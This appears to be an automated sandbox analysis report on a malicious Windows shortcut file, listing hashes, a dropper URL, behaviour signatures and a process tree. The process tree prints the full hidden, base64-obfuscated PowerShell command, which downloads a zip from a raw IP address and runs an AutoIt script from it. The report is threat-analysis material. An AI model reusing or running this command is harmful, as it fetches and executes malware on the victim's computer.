Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22/08/2024, 11:22

General

  • Target

    3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66.lnk

  • Size

    122KB

  • MD5

    ffde299028d48cb2258d274f44d56766

  • SHA1

    678fe2a8a01339138194a70763d69d18d2772beb

  • SHA256

    3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66

  • SHA512

    4273ec62e22493ca163095d7d97c3ad6464d4d3a30eafd906ad2e0a7a3bf10524424ebab394d9c2750a8a6407be6d6830ff250179455c0864db145bcee8899ef

  • SSDEEP

    48:8SJXs8A2A8lBUpIuuwITyJjiYG+OV1sUAZCQkBK:8SJXb9A8bUxjFGpV1sRZJ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://2.58.56.124/API481f.zip

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGEgPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR1cmwgPSAnaHR0cDovLzIuNTguNTYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDgxZi56aXAiOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJHppcFBhdGg7IEFkZC1UeXBlIC1Bc3NlbWJseU5hbWUgU3lzdGVtLklPLkNvbXByZXNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uWmlwRmlsZV06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCwgJGFwcGRhdGEpOyAkYXV0b2l0UGF0aCA9ICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSI7ICRzY3JpcHRQYXRoID0gIiRhcHBkYXRhXHNjcmlwdC5hM3giOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkYXV0b2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3JpcHRQYXRoOyBSZW1vdmUtSXRlbSAtUGF0aCAkemlwUGF0aA0K')) | Invoke-Expression"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGEgPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR1cmwgPSAnaHR0cDovLzIuNTguNTYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDgxZi56aXAiOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJHppcFBhdGg7IEFkZC1UeXBlIC1Bc3NlbWJseU5hbWUgU3lzdGVtLklPLkNvbXByZXNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uWmlwRmlsZV06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCwgJGFwcGRhdGEpOyAkYXV0b2l0UGF0aCA9ICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSI7ICRzY3JpcHRQYXRoID0gIiRhcHBkYXRhXHNjcmlwdC5hM3giOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkYXV0b2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3JpcHRQYXRoOyBSZW1vdmUtSXRlbSAtUGF0aCAkemlwUGF0aA0K')) | Invoke-Expression"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2304-40-0x000007FEF624E000-0x000007FEF624F000-memory.dmp

    Filesize

    4KB

  • memory/2304-41-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2304-42-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

    Filesize

    32KB

  • memory/2304-43-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB

  • memory/2304-44-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB

  • memory/2304-45-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB

  • memory/2304-46-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB

  • memory/2304-47-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB

  • memory/2304-48-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB